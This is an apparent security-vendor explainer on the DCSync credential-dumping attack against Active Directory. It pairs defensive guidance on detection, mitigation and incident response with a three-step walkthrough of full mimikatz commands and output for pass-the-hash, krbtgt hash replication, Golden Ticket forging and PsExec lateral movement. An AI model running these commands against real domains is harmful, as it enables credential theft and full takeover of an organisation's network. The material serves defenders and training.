DCSync

DCSync

DCSync is a credential dumping technique that can lead to the compromise of individual user credentials, and more seriously as a prelude to the creation of a Golden Ticket, as DCSync can be used to compromise the krbtgt account’s password.

To perform a DCSync attack, an adversary must have compromised a user with the Replicating Directory Changes All and Replicating Directory Changes privileges. Members of the Administrators, Domain Admins, Enterprise Admins, and Domain Controllers groups have these privileges by default. It is also possible for any user to be granted these specific privileges. Once obtained, an adversary uses the Directory Replication Service (DRS) Remote Protocol to replicate data (including credentials) from Active Directory.

In addition to domain controllers, some applications – such as Azure Active Directory Connect – have legitimate requirements for replication permissions, but can also become targets for adversaries because of them.

Threat Summary

Target:

Active Directory

ATT&CK® Tactic:

ATT&CK Technique:

Difficulty

Detect:

Hard

Mitigate:

Medium

Respond:

Variable

How DCSync Works

Hover to see each step

Step 1: First, an adversary must compromise an account with the necessary privileges (Replicating Directory Changes All and Replicating Directory Changes) to replicate from Active Directory. The adversary may need to repeat the cycle of internal reconnaissance, lateral movement, and privilege escalation until finding a user with these permissions.

In this example, an attacker is using the hash of a compromised user with the necessary replication permissions to perform a Pass-the-Hash attack to launch a command prompt as the compromised user.

PS> .\mimikatz.exe "privilege::debug" "sekurlsa::msv"
mimikatz # sekurlsa::msv
 
Authentication Id : 0 ; 4018372 (00000000:003d50c4)
Session           : RemoteInteractive from 2
User Name         : PrivUser1
Domain            : Domain
Logon Server      : DC1
Logon Time        : 15/07/2020 20:28:33
SID               : S-1-5-21-5840559-2756745051-1363507867-1105
        msv :
         [00000003] Primary
         * Username : PrivUser1
         * Domain   : Domain
         * NTLM     : eed224b4784bb040aab50b8856fe9f02
         * SHA1     : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
         * DPAPI    : eb62f5bb2cc136b30a19c1d11b81dc77
 
PS> .\mimikatz.exe "sekurlsa::pth /user:PrivUser1 /ntlm:eed224b4784bb040aab50b8856fe9f02 /domain:domain.com"
 
user    : PrivUser1
domain  : Domain.com
program : cmd.exe
impers. : no
NTLM    : eed224b4784bb040aab50b8856fe9f02
  |  PID  6020
  |  TID  3336
  |  LSA Process is now R/W
  |  LUID 0 ; 14438952 (00000000:00dc5228)
  \_ msv1_0   - data copy @ 0000025C281A86C0 : OK !
  \_ kerberos - data copy @ 0000025C27D08608
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000025C287FF6A8 (32) -> null

Step 2: Next, an adversary uses mimikatz (or a similar tool) to replicate credentials from Active Directory. The most common target for replication is the krbtgt account, as this account’s password is a prerequisite for a Golden Ticket.

PS> .\mimikatz.exe "lsadump::dcsync /user:DOMAIN\krbtgt"
 
[DC] 'domain.com' will be the domain
[DC] 'DC1.DOMAIN.com' will be the DC server
[DC] 'DOMAIN\krbtgt' will be the user account
 
Object RDN           : krbtgt
 
** SAM ACCOUNT **
 
SAM Username         : krbtgt
User Principal Name  : krbtgt@DOMAIN.COM
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 09/03/2020 14:51:03
Object Security ID   : S-1-5-21-5840559-2756745051-1363507867-502
Object Relative ID   : 502
 
Credentials:
  Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
 
# ... output truncated ...
 
* Primary:Kerberos-Newer-Keys *
    Default Salt : DOMAIN.COMkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : ffa8bd983a5a03618bdf577c2d79a467265f140ba339b89cc0a9c1bfdb4747f5
      aes128_hmac       (4096) : 471644de05c4834cc6cbc06896210e7d
      des_cbc_md5       (4096) : 23861a94ea83a4cd
 
# ... output truncated ...

Step 3: Lastly, an adversary can use the newly compromised credentials to further their objectives. In this example, possessing the password hash of the krbtgt account enables the attacker to execute a Golden Ticket attack, thereby giving them unfettered access to Active Directory and member computers.

PS> .\mimikatz.exe "kerberos::golden /domain:domain.com /sid:S-1-5-21-5840559-2756745051-1363507867 /krbtgt:1b8cee51fd49e55e8c9c9004a4acc159 /user:Administrator /id:500 /ptt"
 
User      : Administrator
Domain    : domain.com (DOMAIN)
SID       : S-1-5-21-5840559-2756745051-1363507867
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: 1b8cee51fd49e55e8c9c9004a4acc159 - rc4_hmac_nt
Lifetime  : 16/07/2020 13:53:58 ; 14/07/2030 13:53:58 ; 14/07/2030 13:53:58
-> Ticket : ** Pass The Ticket **
 
 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated
 
Golden ticket for 'Administrator @ domain.com' successfully submitted for current session
 
PS> PSExec.exe \\fileserver1 powershell.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1339]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>hostname
fileserver1

Detect, Mitigate, and Respond

Difficulty: Hard

It is possible to detect a DCSync attack by monitoring network traffic to every domain controller, or by analyzing Windows event logs.

Network monitoring

Monitor network traffic for DRSUAPI RPC requests for the operation DsGetNCChanges and compare the source host against a list of domain controllers. If the source host does not appear on that list, then a DCSync attack is suspected. However, without significant investment in packet analysis it is not possible to determine which objects were replicated.

Windows event logs

Event ID 4662 in the subcategory Audit Directory Service Access audits basic information about users performing operations within Active Directory for events specified in an object’s system access-control list (SACL).

Using this event, it is possible to see when a user exercises their Replicating Directory Changes All extended right by filtering the properties field to include {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} which is the control access rights GUID for replicating directory changes.

However, Active Directory event logs only reveal which objects were replicated when diagnostic logging is enabled. Diagnostic logging can have performance impact and is not likely suitable for long-term production use.

Difficulty: Hard

Replication amongst Active Directory domain controllers is a normal part of their operation. Mitigating the risk of DCSync involves protecting replication permissions from abuse.

  • Routinely audit replication permission grants and aggressively embrace the principal of least privilege
  • If a legitimate need for replication permissions exists, adopt compensating controls to mitigate the risk of credential theft
  • Alert, in real-time, on changes to replication permissions
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that an adversary can escalate their privileges.

Difficulty: Medium

Should the use of DCSync be detected, there are several actions one can take to immediately respond. The actions and response difficulty depend upon what was replicated. If only non-privileged users were replicated, then the response difficulty is moderate; if the entire domain or krbtgt was replicated, the response is extremely hard.

  • Activate the incident response process and alert the response team
  • Reset the password of the user that performed the unauthorized DCSync and optionally disable the user to a) force instantaneous replication to all domain controllers, and b) disrupt the adversary’s use of that account
  • Quarantine the impacted machines for forensic investigation, as well as eradication and recovery activities
  • Determine which account’s credentials were replicated:
    • If only specific users were replicated, reset the passwords for those users
    • If the entire domain or the krbtgt user was replicated, you should activate your incident response plan for total Active Directory compromise which should include, but not be limited to, a password reset (twice) of the krbtgt user.